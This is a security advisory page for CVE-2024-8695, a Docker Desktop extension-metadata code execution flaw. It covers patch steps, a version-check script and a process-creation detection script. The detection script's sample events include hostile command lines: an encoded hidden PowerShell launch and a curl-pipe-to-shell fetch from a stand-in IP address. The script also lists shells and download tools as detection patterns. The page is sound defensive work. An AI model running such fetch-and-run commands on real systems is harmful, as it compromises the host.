CVE-2024-8695

9.8 CRITICAL

📋 TL;DR

Docker Desktop before 4.34.2 can be made to execute arbitrary code on the host through a crafted extension description or changelog when a malicious extension is installed. The payload travels in extension metadata that Docker Desktop itself renders, not in container code, so a user who installs the extension has no obvious signal that anything is wrong. All Docker Desktop users on earlier versions are affected, and a successful exploit compromises the host, not just a container.

💻 Affected Systems

Products:
  • Docker Desktop
Versions: All versions before 4.34.2
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is in the extension management system (rendering of extension metadata). Extensions are enabled in a default installation, so every default configuration that allows extension installs is affected.

📦 What is this software?

Docker Desktop is Docker's desktop application for Windows, macOS and Linux. It bundles Docker Engine, the Docker CLI, Docker Compose and a GUI dashboard, and it ships an Extensions Marketplace through which third-party extensions are installed into the application.
⚠️ Risk & Real-World Impact

🔴

Worst Case

Code execution on the host as the user running Docker Desktop, who typically has full control of the local Docker Engine plus access to source trees, credentials and SSH keys. From there data theft, ransomware deployment or a persistent backdoor follow.

🟠

Likely Case

A malicious extension author, or an attacker who takes over a legitimate extension's publishing account, could execute arbitrary code on every machine that installs the extension, stealing credentials, cryptocurrency wallets, or source code and secrets from development environments.

🟢

If Mitigated

Restricting extension installation to vetted publishers reduces exposure to those publishers only, which is still significant if a trusted extension or its update channel is compromised.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires a user to install the malicious extension; once the flaw is understood, crafting the description or changelog payload is low effort.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.34.2

Vendor Advisory: https://docs.docker.com/desktop/release-notes/#4342

Restart Required: Yes

Instructions:

1. Open Docker Desktop.
2. Navigate to Settings > Software Updates.
3. Click 'Check for Updates'.
4. Install version 4.34.2 or later.
5. Restart Docker Desktop.

🔧 Temporary Workarounds

Disable Extension Installation (all platforms)

Prevent installation of new extensions to block potential malicious extensions. In Docker Desktop, open Settings > Extensions, uncheck "Enable Docker Extensions", then Apply & restart.

Remove All Extensions (all platforms)

Uninstall all existing extensions to eliminate potential attack vectors (list installed extensions with docker extension ls first):

docker extension rm <extension-name>    # repeat for each installed extension

🧯 If You Can't Patch

  • Disable Docker Desktop extensions completely
  • Use Docker Engine directly without Docker Desktop

🔍 How to Verify

Check if Vulnerable:

Check Docker Desktop version in Settings > Software Updates. If version is below 4.34.2, system is vulnerable.

Check Version:

docker version --format '{{.Server.Platform.Name}}'

On Docker Desktop this prints the Desktop product version, for example "Docker Desktop 4.34.2 (167172)" (build number illustrative), or check the Docker Desktop GUI. Note that docker version --format '{{.Client.Version}}' reports the Docker CLI/Engine version (27.x), which is not the Docker Desktop version the advisory refers to.

Verify Fix Applied:

Confirm Docker Desktop version is 4.34.2 or higher in Settings > Software Updates.
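The version check and the extension inventory above can be scripted. The following is an added example written for this page, not Docker's own tooling. It assumes that docker version --format '{{.Server.Platform.Name}}' prints "Docker Desktop <major>.<minor>.<patch> (<build>)" on Docker Desktop, and that docker extension ls prints a header row followed by one row per extension with the extension ID in the first column; the extension IDs in the sample are constructed.

```python
"""Added example (not Docker's own tooling): check a Docker Desktop install
against the CVE-2024-8695 fix version (4.34.2) and inventory installed
extensions so they can be removed until the host is patched.

Assumptions: `docker version --format '{{.Server.Platform.Name}}'` prints
"Docker Desktop <major>.<minor>.<patch> (<build>)" on Docker Desktop, and
`docker extension ls` prints a header row then one row per extension whose
first column is the extension ID.
"""
import re
import shutil
import subprocess
from typing import List, Optional, Tuple

FIXED_VERSION: Tuple[int, int, int] = (4, 34, 2)
_DESKTOP_RE = re.compile(r"Docker Desktop (\d+)\.(\d+)\.(\d+)")


def parse_desktop_version(platform_name: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) from a Docker Desktop platform name, or
    None if the string is not a Docker Desktop name (e.g. plain Docker
    Engine, where this advisory does not apply)."""
    m = _DESKTOP_RE.search(platform_name)
    if m is None:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable(platform_name: str) -> Optional[bool]:
    """True if the reported Docker Desktop version predates 4.34.2, False if
    it is 4.34.2 or later, None if this is not Docker Desktop at all.
    Tuple comparison keeps 4.9.x < 4.34.2 (a string compare would not)."""
    version = parse_desktop_version(platform_name)
    if version is None:
        return None
    return version < FIXED_VERSION


def installed_extensions(ls_output: str) -> List[str]:
    """Extract extension IDs (first column) from `docker extension ls`
    output, skipping the header row and blank lines."""
    lines = [ln for ln in ls_output.splitlines() if ln.strip()]
    return [ln.split()[0] for ln in lines[1:]]


def _run(args: List[str]) -> Optional[str]:
    """Run a docker CLI command; None if it fails (e.g. engine not running)."""
    try:
        return subprocess.run(args, check=True, capture_output=True, text=True).stdout
    except (subprocess.CalledProcessError, OSError):
        return None


def main() -> int:
    if shutil.which("docker") is None:
        print("docker CLI not found; check Settings > Software Updates in the GUI")
        return 2
    platform = _run(["docker", "version", "--format", "{{.Server.Platform.Name}}"])
    if platform is None:
        print("docker version failed; is Docker Desktop running?")
        return 2
    platform = platform.strip()
    state = is_vulnerable(platform)
    if state is None:
        print(f"not Docker Desktop ({platform!r}); CVE-2024-8695 does not apply")
        return 0
    print(f"{platform}: {'VULNERABLE, update to 4.34.2 or later' if state else 'patched'}")
    exts = installed_extensions(_run(["docker", "extension", "ls"]) or "")
    print("installed extensions:", ", ".join(exts) or "none")
    if state and exts:
        print("to reduce exposure until patched, run:")
        for ext in exts:
            print(f"  docker extension rm {ext}")
    return 1 if state else 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Run it on each developer workstation; exit status 1 means the Desktop version is below 4.34.2, 0 means patched or not applicable, 2 means the check could not be performed.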

📡 Detection & Monitoring

Log Indicators:

  • Unusual extension installation activity
  • Suspicious process execution from Docker Desktop context
  • Unexpected network connections from Docker Desktop processes

Network Indicators:

  • Outbound connections from Docker Desktop to unexpected destinations
  • DNS queries for suspicious domains from Docker processes

SIEM Query:

parent_process_name:"Docker Desktop" AND process_name:(cmd.exe OR powershell.exe OR pwsh.exe OR sh OR bash OR zsh OR osascript)

Field names are illustrative; map them to your SIEM's process-creation schema. The point is to key on the parent: a Docker Desktop process spawning a shell or script interpreter is the pattern a payload delivered through extension metadata would leave.
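The same parent/child logic as a standalone detection, run over constructed process-creation events in a Sysmon-like shape (ParentImage, Image, CommandLine). This is an added example for this page, not part of the original advisory or any Docker tooling; the Docker Desktop executable names, the file paths and all four sample events are assumptions and should be tuned to what your own fleet reports.

```python
"""Added example (not part of the advisory): flag process-creation events in
which a Docker Desktop process spawns a shell or script interpreter. Events
are constructed in a Sysmon-like shape; map the field names to your SIEM.
Process names and paths below are assumptions, not Docker documentation."""
import ntpath
from typing import Dict, Iterable, List

# Assumed executable names of the Docker Desktop UI/backend processes.
DOCKER_DESKTOP_PARENTS = {
    "docker desktop.exe", "docker desktop",
    "com.docker.backend.exe", "com.docker.backend",
}
# Interpreters and download tools a GUI application has little reason to launch.
INTERPRETERS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "certutil.exe",
    "sh", "bash", "zsh", "python", "python3", "osascript", "curl", "wget",
}


def _basename(path: str) -> str:
    # ntpath splits on both '\\' and '/', so one call covers Windows and POSIX paths
    return ntpath.basename(path).lower()


def is_suspicious(event: Dict[str, str]) -> bool:
    """True when a Docker Desktop process is the parent and the child is an
    interpreter; docker.exe and other expected children are not flagged."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    return parent in DOCKER_DESKTOP_PARENTS and child in INTERPRETERS


def suspicious_children(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Filter a stream of process-creation events down to the suspicious ones."""
    return [e for e in events if is_suspicious(e)]


# Constructed sample events (paths and command lines are made up for the demo).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Docker\Docker\frontend\Docker Desktop.exe",
     "Image": r"C:\Program Files\Docker\Docker\resources\bin\docker.exe",
     "CommandLine": "docker.exe extension ls"},                       # benign child
    {"ParentImage": r"C:\Program Files\Docker\Docker\frontend\Docker Desktop.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},       # suspicious
    {"ParentImage": "/Applications/Docker.app/Contents/MacOS/Docker Desktop",
     "Image": "/bin/sh",
     "CommandLine": "sh -c 'curl -s http://198.51.100.7/p | sh'"},   # suspicious
    {"ParentImage": "/usr/bin/bash", "Image": "/bin/sh",
     "CommandLine": "sh ./build.sh"},                                 # not Docker Desktop
]


def main() -> None:
    for hit in suspicious_children(SAMPLE_EVENTS):
        print(f"ALERT parent={hit['ParentImage']!r} child={hit['Image']!r}")
        print(f"      cmdline={hit['CommandLine']}")


if __name__ == "__main__":
    main()
```

Docker Desktop legitimately launches the docker CLI and its own helper binaries, so the allow-by-default, flag-interpreters approach keeps the rule quiet; widen INTERPRETERS or add command-line patterns once you have a baseline of what the application normally spawns on your hosts.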
